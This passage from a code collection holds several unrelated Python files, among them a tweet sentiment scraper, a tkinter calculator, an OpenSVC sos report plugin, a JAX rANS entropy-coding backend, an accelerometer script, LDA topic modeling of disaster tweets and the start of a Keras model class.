views, replies, retweets, followers,\nand extra hashtags. The function searches for tweets that contain a list of hashtags, are\nin the specified language, and do not contain any of the specified keywords. The function\nreturns a maximum of num_tweets tweets.\n\nmain(hashtags: list[str], since_date: str, lang: str, exclude_keywords: list[str],\nnum_tweets: int) -> None: This function is the main function that runs when the module is\nexecuted. The function calls the scrape_tweets function to scrape tweets and then calls\nthe get_sentiment_scores function to calculate the sentiment scores of the tweets. 
The\nfunction prints out the sentiment scores of each tweet.\n\"\"\"\nimport logging\nimport os\nimport re\n\nimport numpy as np\nimport pandas as pd\nimport snscrape.modules.twitter as sntwitter\nfrom better_profanity import profanity\nfrom textblob import TextBlob\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\ndef get_date_range(since_date_str: str) -> tuple[str, str]:\n \"\"\"\n Returns a tuple of the first and last date of the previous month from the given date\n string.\n\n Args:\n since_date_str (str): A string in the format '%Y-%m-%d' representing the starting\n date.\n\n Returns:\n Tuple[str, str]: A tuple of two strings representing the start and end date of the\n previous month in the format '%Y-%m-%d'.\n\n Example:\n >>> get_date_range('2022-02-15')\n ('2022-01-01', '2022-01-31')\n \"\"\"\n import calendar\n import datetime\n\n # Convert since date string to datetime.date object\n since_date = datetime.datetime.strptime(since_date_str, \"%Y-%m-%d\").date()\n\n # Calculate the first day of the previous month\n start_date = datetime.date(\n since_date.year, since_date.month, 1\n ) - datetime.timedelta(days=1)\n start_date = datetime.date(start_date.year, start_date.month, 1)\n\n # Calculate the last day of the previous month\n last_day_of_month = calendar.monthrange(start_date.year, start_date.month)[1]\n end_date = datetime.date(start_date.year, start_date.month, last_day_of_month)\n\n # Convert the dates to string format and return them\n # '2022-01-01'\n return start_date.strftime(\"%Y-%m-%d\"), end_date.strftime(\"%Y-%m-%d\")\n\n\ndef clean_tweet(tweet: str, stopwords: list[str] = []) -> str:\n \"\"\"\n Cleans a tweet by removing URLs, @mentions, hashtags, punctuation, profanity, and\n non-alphanumeric characters, and splitting it into words. Optionally remove a list of\n stopwords.\n\n Args:\n tweet (str): The tweet to be cleaned.\n stopwords (list[str], optional): A list of words to be removed. 
Defaults to [].\n\n Returns:\n str: The cleaned tweet.\n \"\"\"\n import string\n\n if isinstance(tweet, float):\n return \"\"\n\n # Remove URLs, @mentions, and hashtags\n tweet = re.sub(r\"(https?://\\S+|www\\.\\S+)\", \"\", tweet)\n tweet = re.sub(r\"@\\S+\", \"\", tweet)\n tweet = re.sub(r\"#[\\w-]+\", \"\", tweet)\n\n # Remove punctuation and brackets\n tweet = tweet.translate(str.maketrans(\"\", \"\", string.punctuation))\n tweet = re.sub(r\"\\[.*?\\]\", \"\", tweet)\n\n # Remove profanity and contractions\n tweet = profanity.censor(tweet.lower())\n tweet = re.sub(r\"'\\w+\", \"\", tweet)\n\n # Remove non-alphanumeric characters and split into words\n words = re.findall(r\"\\b\\w+\\b\", tweet)\n words = [w for w in words if w not in stopwords]\n\n # Join words back into a string\n cleaned_tweet = \" \".join(words)\n\n return cleaned_tweet\n\n\ndef get_sentiment_scores(text: str) -> dict[str, float]:\n \"\"\"\n Calculate the sentiment scores using TextBlob and VADER.\n Args:\n text (str): The text for which sentiment scores are to be calculated.\n Returns:\n A dictionary containing the following keys:\n Polarity (float): The polarity score of the text.\n Subjectivity (float): The subjectivity score of the text.\n Sentiment (str): The sentiment label of the text, i.e., positive, negative, or\n neutral.\n Negative Score (float): The negative sentiment score of the text.\n Neutral Score (float): The neutral sentiment score of the text.\n Positive Score (float): The positive sentiment score of the text.\n Compound Score (float): The compound sentiment score of the text.\n \"\"\"\n blob = TextBlob(text)\n polarity, subjectivity = blob.sentiment\n\n sia = SentimentIntensityAnalyzer()\n scores = sia.polarity_scores(text)\n return {\n \"Polarity\": polarity,\n \"Subjectivity\": subjectivity,\n \"Sentiment\": get_sentiment_label(scores[\"compound\"]),\n \"Negative Score\": scores[\"neg\"],\n \"Neutral Score\": scores[\"neu\"],\n \"Positive Score\": scores[\"pos\"],\n \"Compound Score\": scores[\"compound\"],\n }\n\n\ndef get_sentiment_label(compound: float) -> str:\n \"\"\"\n Get sentiment label (positive, negative, or neutral) from compound score value.\n Args:\n compound (float): The compound sentiment score of the text.\n Returns:\n A string representing the sentiment label of the text, i.e., positive, negative,\n or neutral.\n \"\"\"\n if compound > 0.1:\n return \"positive\"\n elif compound < -0.1:\n return \"negative\"\n else:\n return \"neutral\"\n\n\ndef scrape_tweets(\n hashtags: list[str],\n since_date: str,\n until_date: str,\n lang: str,\n exclude_keywords: list[str],\n num_tweets: int,\n hashtag_operator: str = \"OR\",\n) -> pd.DataFrame:\n \"\"\"\n Use snscrape to scrape tweets and extract relevant data.\n Args:\n hashtags (list[str]): A list of hashtags to search for.\n since_date (str): A string representing the date from which to start searching for\n tweets (YYYY-MM-DD format).\n lang (str): The language of the tweets to search for.\n exclude_keywords (list[str]): A list of keywords to exclude from the search results.\n num_tweets (int): The number of tweets to scrape.\n hashtag_operator (str): OR or AND in the query. 
defaults to OR.\n Returns:\n A pandas DataFrame\n \"\"\"\n query = (\n f\" {hashtag_operator} \".join(hashtags)\n + f\" lang:{lang} since:{since_date}\"\n + f\" until:{until_date}\"\n + \"\".join([f\" -{kw}\" for kw in exclude_keywords])\n )\n tweets_list = []\n logger.info(f\"processing tweets from {since_date} until {until_date}.\")\n for i, tweet in enumerate(\n sntwitter.TwitterSearchScraper(query, maxEmptyPages=100).get_items()\n ):\n if i >= num_tweets:\n break\n tweet_dict = {\n \"Datetime\": tweet.date,\n \"Tweet Id\": tweet.id,\n \"Original Text\": tweet.rawContent,\n \"Username\": tweet.user.username,\n \"Likes\": tweet.likeCount,\n \"Views\": int(tweet.viewCount) if tweet.viewCount is not None else 0,\n \"Replies\": tweet.replyCount,\n \"Retweets\": tweet.retweetCount,\n \"Followers\": tweet.user.followersCount,\n \"Extra Hashtags\": [\n tag.lower()\n for tag in re.findall(r\"#(\\w+)\", tweet.rawContent)\n if tag.lower() not in [h.lower().replace(\"#\", \"\") for h in hashtags]\n ],\n }\n tweets_list.append(tweet_dict)\n\n return pd.DataFrame(tweets_list)\n\n\ndef main(\n hashtags: list[str],\n since_date: str,\n until_date: str,\n lang: str,\n exclude_keywords: list[str],\n num_tweets: int,\n) -> pd.DataFrame:\n \"\"\"\n main function that utilizes scrape_tweets, clean_tweets and get_sentiment_scores\n to get a dataframe of tweets with desired data.\n \"\"\"\n tweets_df = scrape_tweets(\n hashtags, since_date, until_date, lang, exclude_keywords, num_tweets\n )\n\n # Clean text and add column to DataFrame\n if not tweets_df.empty:\n tweets_df[\"Cleaned Text\"] = tweets_df[\"Original Text\"].apply(clean_tweet)\n\n # Get sentiment scores and add columns to DataFrame\n sentiment_scores = tweets_df[\"Cleaned Text\"].apply(get_sentiment_scores)\n tweets_df = pd.concat([tweets_df, sentiment_scores.apply(pd.Series)], axis=1)\n\n # Add additional columns\n tweets_df = tweets_df[\n [\n \"Datetime\",\n \"Tweet Id\",\n \"Original Text\",\n \"Cleaned Text\",\n \"Polarity\",\n \"Subjectivity\",\n \"Sentiment\",\n \"Negative Score\",\n \"Neutral Score\",\n \"Positive Score\",\n \"Compound Score\",\n \"Username\",\n \"Likes\",\n \"Views\",\n \"Replies\",\n \"Retweets\",\n \"Followers\",\n \"Extra Hashtags\",\n ]\n ]\n\n return tweets_df\n\n\nif __name__ == \"__main__\":\n num_tweets = int(os.getenv(\"num_tweets\"))\n hashtags = [\n \"#xbox\",\n \"#xboxseriesx\",\n \"#xboxseriess\",\n \"#xboxone\",\n \"#xboxgames\",\n \"#xboxgamepass\",\n \"#xboxlive\",\n \"#xboxcommunity\",\n \"#xboxlivegold\",\n \"#xboxgamepassultimate\",\n \"#gamepassultimate\",\n ]\n start_date = os.getenv(\"start_date\")\n start_date_str, end_date_str = get_date_range(start_date)\n lang = os.getenv(\"lang\", \"en\")\n exclude_keywords = [\n \"sale\",\n \"discount\",\n \"buy\",\n \"shop\",\n \"promote\",\n \"click\",\n \"shopify\",\n \"playstation\",\n \"ps5\",\n \"ps4\",\n \"nintendo\",\n \"nintendoswitch\",\n ]\n\n df = main(\n hashtags, start_date_str, end_date_str, lang, exclude_keywords, num_tweets\n )\n data_vol = os.getenv(\"local_path\")\n df.to_parquet(f\"{data_vol}tweets-{start_date_str}.parquet\")\n logger.info(f\"saved data to file tweets-{start_date_str}.parquet\")\n","repo_name":"Liftingthedata/xbox_de_project","sub_path":"scrapers/twitter/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":11469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40973121442","text":"from tkinter import *\nimport math\nroot = 
Tk()\r\nroot.title('Calculator')\r\nroot.geometry('500x300')\r\nshow = Label(root, text='',font=('宋体', 24), width=20, bg='yellow') # '宋体' (SimSun) is a font name, kept as-is\r\nshow.pack()\r\nframe = Frame(root)\r\nframe.pack()\r\n\r\n\r\ndef click(event):\r\n if event.widget['text'] in ('1','2','3','4','5','6','7','8','9','0','.','*','/','-','+'):\r\n show['text'] = show['text'] + event.widget['text']\r\n elif event.widget['text'] == '=' and show['text'] != '':\r\n show['text'] = str(eval(show['text']))\r\n elif event.widget['text'] == 'Clear':\r\n show['text'] = ''\r\n elif event.widget['text'] == 'Back':\r\n show['text'] = show['text'][0:-1]\r\n elif event.widget['text'] == 'sqrt':\r\n show['text'] = str(math.sqrt(float(show['text'])))\r\n\r\n\r\nname = ['Clear','=','Null','Null2','.','Back','0','/','1','2','3','*','4','5','6','-','7','8','9','+','sqrt']\r\n\r\nfor i in range(len(name)):\r\n button = Button(frame, text=name[i], width=5)\r\n button.grid(row=i//4, column=i%4)\r\n button.bind('<Button-1>', click)\r\n\r\nmenu = Menu(root)\r\nf_menu = Menu(menu)\r\nf_menu.add_command(label='QUIT', command=root.quit)\r\nf_menu.add_command(label='Exit', command=root.quit)\r\nmenu.add_cascade(label='Menu', menu=f_menu)\r\nroot['menu'] = menu\r\nroot.mainloop()","repo_name":"fanghuicocacola/Fanghui-Lang","sub_path":"python/Code/Python Learner/tk计算器3.py","file_name":"tk计算器3.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18915834346","text":"from sos.report.plugins import Plugin, IndependentPlugin\n\n\nclass Opensvc(Plugin, IndependentPlugin):\n\n short_desc = 'OpenSVC cluster and services (config and state collection)'\n plugin_name = 'opensvc'\n profiles = ('cluster', 'services', 'system')\n packages = ('opensvc',)\n\n def get_status(self, kind):\n getobjs = self.collect_cmd_output(\"om %s ls --color=no\" % kind)\n dirname = kind + '_status'\n if getobjs['status'] == 0:\n for line in getobjs['output'].splitlines():\n self.add_cmd_output(\n \"om %s print status --color=no\" % line,\n subdir=dirname\n )\n\n def setup(self):\n self.add_copy_spec([\n \"/etc/opensvc/*\",\n \"/var/log/opensvc/*\",\n \"/etc/conf.d/opensvc\",\n \"/etc/default/opensvc\",\n \"/etc/sysconfig/opensvc\",\n \"/var/lib/opensvc/*.json\",\n \"/var/lib/opensvc/list.*\",\n \"/var/lib/opensvc/ccfg\",\n \"/var/lib/opensvc/cfg\",\n \"/var/lib/opensvc/certs/ca_certificates\",\n \"/var/lib/opensvc/certs/certificate_chain\",\n \"/var/lib/opensvc/compliance/*\",\n \"/var/lib/opensvc/namespaces/*\",\n \"/var/lib/opensvc/node/*\",\n \"/var/lib/opensvc/sec/*\",\n \"/var/lib/opensvc/svc/*\",\n \"/var/lib/opensvc/usr/*\",\n \"/var/lib/opensvc/vol/*\",\n ])\n self.add_cmd_output([\n \"ls -laRt /var/lib/opensvc\",\n \"om pool status --verbose --color=no\",\n \"om net status --verbose --color=no\",\n \"om mon --color=no\",\n \"om daemon dns dump --color=no\",\n \"om daemon relay status --color=no\",\n \"om daemon status --format flat_json --color=no\"\n ])\n self.get_status('vol')\n self.get_status('svc')\n\n def postproc(self):\n # Example:\n #\n # [hb#2]\n # secret = mypassword\n # type = relay\n # timeout = 30\n #\n # to\n #\n # [hb#2]\n # secret = ****************************\n # type = relay\n # timeout = 30\n\n regexp = r\"(\\s*secret =\\s*)\\S+\"\n self.do_file_sub(\n \"/etc/opensvc/cluster.conf\",\n regexp,\n r\"\\1****************************\"\n )\n\n# vim: set et ts=4 sw=4 
:\n","repo_name":"sosreport/sos","sub_path":"sos/report/plugins/opensvc.py","file_name":"opensvc.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"7"} +{"seq_id":"44630219623","text":"from typing import NamedTuple, Sequence, Tuple\n\nimport jax.lax as lax\nimport jax.numpy as jnp\nfrom jax.numpy import ndarray\nfrom jax.random import PRNGKey, randint\n\nHEAD_PRECISION, HEAD_DTYPE = 32, \"uint32\"\nTAIL_PRECISION, TAIL_DTYPE = 8, \"uint8\"\nHEAD_MIN = 1 << (HEAD_PRECISION - TAIL_PRECISION)\nTAIL_DEFAULT_PRNGKEY = PRNGKey(1337)\nTAIL_MAX = (1 << TAIL_PRECISION) - 1\n\n\nclass CrayTail(NamedTuple):\n \"\"\"\n Type for handling craystack API compressed message tail.\n\n The Craystack API decomposes a compressed message into a head and a tail.\n In JAX the tail is implemented as a 2-tuple with an int that points to the\n current index in the tail.\n\n The Craystack message structure is described in `A tutorial on the range\n variant of asymmetric numeral systems (J. Townsend)\n <https://arxiv.org/abs/2001.09186>`_.\n\n Args:\n pointer: An integer pointing to the current end of data written\n to the end of the array.\n data: An array of tail data.\n \"\"\"\n\n pointer: ndarray\n data: ndarray\n\n\nclass CrayCompressedMessage(NamedTuple):\n \"\"\"\n Type for handling craystack API compressed messages.\n\n The Craystack API decomposes a compressed message into a head and a tail.\n In JAX the tail is implemented as a 2-tuple with an int that points to the\n current index in the tail.\n\n The Craystack message structure is described in `A tutorial on the range\n variant of asymmetric numeral systems (J. Townsend)\n <https://arxiv.org/abs/2001.09186>`_.\n\n Args:\n head: Craystack head, an array of unsigned integers\n (typically 32-bit) taking the shape of the message.\n tail: Craystack tail, a tuple with a variable-length array of 8-bit\n unsigned integers and an integer that points to the current size\n of data written to the array.\n \"\"\"\n\n head: ndarray\n tail: CrayTail\n\n\ndef empty_message(shape: Sequence[int], tail_capacity: int) -> CrayCompressedMessage:\n \"\"\"\n Creates an empty message with the head initialized to the min value.\n\n Args:\n shape: Shape of message to create, excluding batch dimensions and\n message length.\n tail_capacity: Size of the Craystack tail.\n\n Returns:\n An empty base message.\n \"\"\"\n return CrayCompressedMessage(\n jnp.full(shape, HEAD_MIN, HEAD_DTYPE),\n empty_stack(tail_capacity),\n )\n\n\ndef empty_stack(capacity: int, prng_key: ndarray = TAIL_DEFAULT_PRNGKEY) -> CrayTail:\n \"\"\"Returns a tuple with the size of the stack and a stack array.\"\"\"\n return CrayTail(\n jnp.array([capacity]), randint(prng_key, (capacity,), 0, TAIL_MAX, TAIL_DTYPE)\n )\n\n\ndef tail_push(tail: CrayTail, push_indices: ndarray, data: ndarray) -> CrayTail:\n \"\"\"\n Push data to tail at specified indices.\n\n Args:\n tail: A CrayTail to push data to.\n push_indices: Indices specifying push locations (for interleaved\n coding).\n\n Returns:\n ``tail`` with data inserted at ``push_indices`` and tail pointer moved\n to end of new data.\n \"\"\"\n push_indices, data = jnp.ravel(push_indices), jnp.ravel(data)\n limit, tail_data = tail\n # insert current information batch into the tail\n return CrayTail(\n limit - push_indices.sum(),\n lax.dynamic_update_slice(\n tail_data, lax.sort_key_val(push_indices, data)[1], limit - data.size\n ),\n )\n\n\ndef tail_pop(\n tail: CrayTail, pop_indices: ndarray, allow_empty_pop: bool = False\n) -> 
Tuple[CrayTail, ndarray]:\n \"\"\"\n Pop data from tail at specified indices.\n\n Args:\n tail: A CrayTail to pop data from.\n pop_indices: Indices specifying pop locations (for interleaved\n coding).\n allows_empty_pops: A boolean that specifys if random bits should\n be created on demand, if the stack is depleted.\n\n Returns:\n A 2-tuple containing:\n ``tail`` with data popped from top of stack by moving the tail\n pointer.\n The information content that was popped.\n\n \"\"\"\n pop_indices_flat = jnp.ravel(pop_indices) # interleave flattening\n limit, data = tail\n unsorted = lax.sort_key_val(pop_indices_flat, jnp.arange(pop_indices.size))[1]\n\n limit = lax.cond(\n allow_empty_pop,\n lambda _: jnp.clip(limit + pop_indices.sum(), 0, len(data)),\n lambda _: limit + pop_indices.sum(),\n None,\n )\n # here we return a slice containing the information in the pop indices\n # we don't actually need to pop the values from the array - instead we just\n # move the pointer along and remove the popped values at the end\n return CrayTail(limit, data), jnp.reshape(\n lax.sort_key_val(\n unsorted,\n lax.dynamic_slice(\n data, limit - pop_indices.size, pop_indices_flat.shape # type: ignore\n ),\n )[1],\n pop_indices.shape,\n )\n\n\ndef push_symbols(\n compressed_message: CrayCompressedMessage,\n cdf_low: ndarray,\n cdf_high: ndarray,\n precision: int,\n) -> CrayCompressedMessage:\n \"\"\"\n Pushes information corresponding to a symbol on the top of the stack.\n\n Args:\n compressed_message: Input stack to have data pushed to.\n cdf_low: The low CDF value, e.g., ``cdf[symbol]``.\n cdf_high: The high CDF, e.g., ``cdf[symbol+1]``.\n precision: Operating precision for push operations.\n\n Returns:\n Compressed message with information content pushed to top of stack.\n \"\"\"\n head, tail = compressed_message\n frequencies = cdf_high - cdf_low\n\n # Why three writes you may ask?\n # The answer is to vectorize. In the pop function normally this is done\n # with a while loop that would renormalize the range in steps of 8 bits.\n # Since we're using 32 bits for the head the increments can come at levels\n # of 8, 16, or 24, depending on the starting value of the head. 
Since the\n # push operation is the inverse, we have three possible pushes.\n\n indices = head >> 2 * TAIL_PRECISION + HEAD_PRECISION - precision >= frequencies\n tail = tail_push(tail, indices, head.astype(TAIL_DTYPE))\n head = jnp.where(indices, head >> TAIL_PRECISION, head)\n\n indices = head >> 1 * TAIL_PRECISION + HEAD_PRECISION - precision >= frequencies\n tail = tail_push(tail, indices, head.astype(TAIL_DTYPE))\n head = jnp.where(indices, head >> TAIL_PRECISION, head)\n\n indices = head >> HEAD_PRECISION - precision >= frequencies\n tail = tail_push(tail, indices, head.astype(TAIL_DTYPE))\n head = jnp.where(indices, head >> TAIL_PRECISION, head)\n\n head_div_freqs, head_mod_freqs = jnp.divmod(head, frequencies)\n\n return CrayCompressedMessage(\n (head_div_freqs << precision) + head_mod_freqs + cdf_low, tail\n )\n\n\ndef pop_symbols(\n compressed_message: CrayCompressedMessage,\n cfs: int,\n cdf_low: int,\n cdf_high: int,\n precision: int,\n allow_empty_pops: bool = False,\n) -> CrayCompressedMessage:\n \"\"\"\n Pops information corresponding to single symbol from the top of the stack.\n\n Args:\n compressed_message: Input stack to have data popped from.\n cfs: The CDF symbol value.\n cdf_low: The low CDF value, e.g., ``cdf[symbol]``.\n cdf_high: The high CDF, e.g., ``cdf[symbol+1]``.\n precision: Operating precision for pop operations.\n\n Returns:\n Compressed message with information content popped from top of stack.\n \"\"\"\n frequencies = cdf_high - cdf_low\n head = jnp.array(\n frequencies * (compressed_message[0] >> precision) + cfs - cdf_low,\n dtype=HEAD_DTYPE,\n )\n tail = compressed_message[1]\n\n # Why range over three you may ask?\n # The answer is to vectorize. In the pop function normally this is done\n # with a while loop that would renormalize the range in steps of 8 bits.\n # Since we're using 32 bits for the head the increments can come at levels\n # of 8, 16, or 24, depending on the starting value of the head.\n\n for _ in range(3):\n indices = jnp.less(head, HEAD_MIN)\n tail, new_head = tail_pop(tail, indices, allow_empty_pops)\n head = jnp.where(indices, head << TAIL_PRECISION | new_head, head)\n\n return CrayCompressedMessage(head.astype(HEAD_DTYPE), tail)\n\n\ndef peek(compressed_message: CrayCompressedMessage, precision: int) -> int:\n \"\"\"\n Look at the top of the stack without popping.\n\n Args:\n compressed_message: Stack to peek into top of.\n precision: Precision with which to unpack Craystack head.\n\n Returns:\n Current CDF value from top of stack.\n \"\"\"\n head = compressed_message[0]\n return head & ((1 << precision) - 1)\n\n\ndef craymessage_to_array(\n compressed_message: CrayCompressedMessage,\n) -> Tuple[ndarray, int]:\n \"\"\"\n Flatten a CrayCompressedMessage to a single array.\n\n Args:\n compressed_message: Message to be flattened.\n\n Returns:\n A 2-tuple with:\n A flattened version of compressed_message.\n An integer specifying the message length.\n \"\"\"\n head, ([tail_limit], tail_data) = compressed_message\n head = jnp.ravel(head)\n return (\n jnp.concatenate(\n [\n (head >> 3 * TAIL_PRECISION).astype(TAIL_DTYPE), # type: ignore\n (head >> 2 * TAIL_PRECISION).astype(TAIL_DTYPE), # type: ignore\n (head >> TAIL_PRECISION).astype(TAIL_DTYPE), # type: ignore\n head.astype(TAIL_DTYPE),\n tail_data,\n ]\n ),\n head.shape[0] * 4 + tail_limit,\n )\n\n\ndef array_to_craymessage(\n compressed_message: ndarray, shape: Sequence[int], tail_limit: int\n) -> CrayCompressedMessage:\n \"\"\"\n Convert a flattened message back to 
CrayCompressedMessage format.\n\n Args:\n compressed_message: Message to be unflattened.\n shape: Shape of original message (specifies shape of the head).\n tail_limit: Size of the tail.\n\n Returns:\n Message in standard CrayCompressedMessage format.\n \"\"\"\n size = int(jnp.prod(jnp.array(shape)))\n head_highest, head_high, head_low, head_lowest, tail = jnp.split(\n compressed_message, [size, 2 * size, 3 * size, 4 * size]\n )\n head = (\n head_highest.astype(HEAD_DTYPE) << 3 * TAIL_PRECISION\n | head_high.astype(HEAD_DTYPE) << 2 * TAIL_PRECISION\n | head_low.astype(HEAD_DTYPE) << 1 * TAIL_PRECISION\n | head_lowest.astype(HEAD_DTYPE)\n )\n tail = CrayTail(jnp.array([tail_limit]), tail)\n\n return CrayCompressedMessage(jnp.reshape(head, size), tail)\n\n\ndef insert_zeros(\n message: ndarray, shape: Sequence[int], tail_capacity: int\n) -> Tuple[ndarray, int]:\n \"\"\"Insert zeros between head and tail based on tail capacity.\"\"\"\n head_size = int(jnp.prod(jnp.array(shape)) * 4)\n splits = jnp.split(message, [head_size])\n needed_zeros = tail_capacity - splits[1].shape[0]\n tail_limit = needed_zeros + 1\n\n if needed_zeros < 0:\n raise ValueError(\"tail_capacity insufficient for needed buffer size.\")\n\n return (\n jnp.concatenate((splits[0], jnp.zeros(needed_zeros, TAIL_DTYPE), splits[1])),\n tail_limit,\n )\n\n\ndef convert_to_embedded(\n compressed_messages: Sequence[ndarray],\n message_shape: Sequence[int],\n tail_capacity: int,\n) -> Tuple[ndarray, ndarray]:\n \"\"\"\n Embed a truncated list of byte arrays into equal-size arrays.\n\n Args:\n compressed_messages: Packed message to embed into a standard-length.\n message_shape: Shape of unpacked message.\n tail_capacity: Desired size of the tail.\n\n Returns:\n A 2-tuple containing:\n A full-length stack with the message embedded into constant sizes\n via zero-padding.\n A list of integers pointing to the end of each tail.\n \"\"\"\n embedded_messages = []\n tail_limits = []\n for cm in compressed_messages:\n cm_conv, tail_limit = insert_zeros(cm, message_shape, tail_capacity)\n embedded_messages.append(cm_conv)\n tail_limits.append(tail_limit)\n\n return jnp.stack(embedded_messages), jnp.stack(tail_limits)\n","repo_name":"facebookresearch/NeuralCompression","sub_path":"projects/jax_entropy_coders/craystack/_backend.py","file_name":"_backend.py","file_ext":"py","file_size_in_byte":12157,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"7"} +{"seq_id":"24241913296","text":"import math\nimport time\nimport board\nimport adafruit_mpu6050\ni=0\nlisty=[]\ni2c = board.I2C()\nmpu = adafruit_mpu6050.MPU6050(i2c)\n'''\nfor _ in range(10*51):\n\tif i!=50:\n\t\t\n\t\tx,y,z = mpu.acceleration\n\t\n\telse:\n\t\ttotal=math.sqrt(pow(x,2)+pow(y,2)+pow(z,2))\n\t\t#print (\"x: \"+str(x))\n\t\t#print (\"y: \"+str(y))\n\t\t#print (\"z: \"+str(z))\n\t\tprint (round(total,0))\n\t\ti=0\n i+=1\n'''\n'''\n\ninitRead=math.sqrt()\n\nif total in range(10):\n health-=1\nelif total in range(10,20):\n health-=2\n\n\n'''\n\ndef sumSquares(x,y,z):\n return math.sqrt(pow(x,2)+pow(y,2)+pow(z,2))\n\nprint(\"\\n\"*50)\n\nwhile True:\n x,y,z=mpu.acceleration\n movement = round(sumSquares(x,y,z),0)\n if movement>=20:\n print(movement)\n\n","repo_name":"cbatts1228/Portfolio","sub_path":"PythonProjects/BattsPiFighter/accelerometer6050.py","file_name":"accelerometer6050.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} 
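A minimal usage sketch for the craystack-style rANS coder in _backend.py above. The import path, the 16-bit precision, and the CDF bounds are illustrative assumptions, not taken from the original file; only the function signatures come from the code itself.

import jax.numpy as jnp
from craystack import _backend as backend  # hypothetical import path for the file above

precision = 16  # assumed operating precision
msg = backend.empty_message(shape=(4,), tail_capacity=1024)  # four parallel coder lanes
# Encode: cdf_low/cdf_high delimit one symbol's probability mass per lane.
cdf_low = jnp.full((4,), 1000, dtype="uint32")
cdf_high = jnp.full((4,), 2000, dtype="uint32")
msg = backend.push_symbols(msg, cdf_low, cdf_high, precision)
# Decode: peek reads the CDF value on top of the stack, pop inverts the push.
cfs = backend.peek(msg, precision)
msg = backend.pop_symbols(msg, cfs, cdf_low, cdf_high, precision)

Note the stack discipline of rANS: symbols must be popped in the reverse order they were pushed.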
+{"seq_id":"407504549","text":"# encoding=utf-8\n\nimport os\nfrom shutil import copy\n\n\nclass Setup:\n def __init__(self):\n self.package_path = os.path.dirname(os.path.abspath(__file__))\n self.struct_file = open(self.package_path + \"/struct.txt\", \"r\")\n\n def setfile(self):\n for line in self.struct_file:\n filename, path = line.split(\" \")\n src = os.path.join(self.package_path, filename)\n des = path\n copy(src, des)\n\n\nif __name__ == \"__main__\":\n s = Setup()\n s.setfile()\n","repo_name":"sxc562586657/tcollector","sub_path":"uagent/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"73933522783","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: zding\n\"\"\"\n\nfrom sklearn.decomposition import LatentDirichletAllocation\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport preprocessing\nimport numpy as np\nimport pyLDAvis\nimport pyLDAvis.sklearn\n\nlda = LatentDirichletAllocation(n_components=10, max_iter=5)\ndf=preprocessing.as_list('train.csv')\ndata=df['text_list'].tolist()\ndisaster_data=[]\nnondisaster_data=[]\nfor index, row in df.iterrows():\n new_list=[]\n for t in row['text_list']:\n if not t.startswith('http') and \\\n not t.startswith('#') and \\\n not t.startswith('@'):\n new_list.append(t)\n if row['target']==1:\n disaster_data.append(','.join(new_list))\n else:\n nondisaster_data.append(','.join(new_list))\ncount_vect = CountVectorizer(stop_words='english')\n'''\nedit here if want to switch between nondisaster topics and disaster topics\n'''\ndisaster_terms=count_vect.fit_transform(disaster_data)\n#nondisaster_terms=count_vect.fit_transform(nondisaster_data)\n\n\nlda.fit_transform(disaster_terms)\n\n#print words in top ten topics\nfor index, topic in enumerate(lda.components_):\n print([count_vect.get_feature_names()[i] for i in topic.argsort()[-11:-1]])\n print('\\n')\n \n#visualize topic modeling using pyldavis\nimg=pyLDAvis.sklearn.prepare(lda, disaster_terms, count_vect)\npyLDAvis.show(img)\n","repo_name":"dingzy1995/disasterorNot_twitterChallenge","sub_path":"topic_modeling.py","file_name":"topic_modeling.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"282462529","text":"import pandas as pd\nimport numpy as np\n\nimport os\n\nimport tensorflow.keras as tk\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D, Flatten, BatchNormalization, Dropout\n\nimport warnings\nwarnings.simplefilter('ignore')\n\nclass Models:\n '''\n \n fit and save as .h5 five convolutional NN models, one for every dataset.\n \n '''\n def __init__(self):\n '''\n \n define the folder path that contain all the tensors.\n \n '''\n self.path = 'tensors/'\n\n def arrays(self):\n '''\n \n load X, y of every dataset.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('en'):\n if file[3] == 'X':\n self.en_X = np.load(self.path + file)\n if file[3] == 'y':\n self.en_y = np.load(self.path + file)\n\n if file.startswith('fr'):\n if file[3] == 'X':\n self.fr_X = np.load(self.path + file)\n if file[3] == 'y':\n self.fr_y = np.load(self.path + file)\n\n if file.startswith('ge'):\n if file[3] == 'X':\n self.ge_X = np.load(self.path + file)\n if 
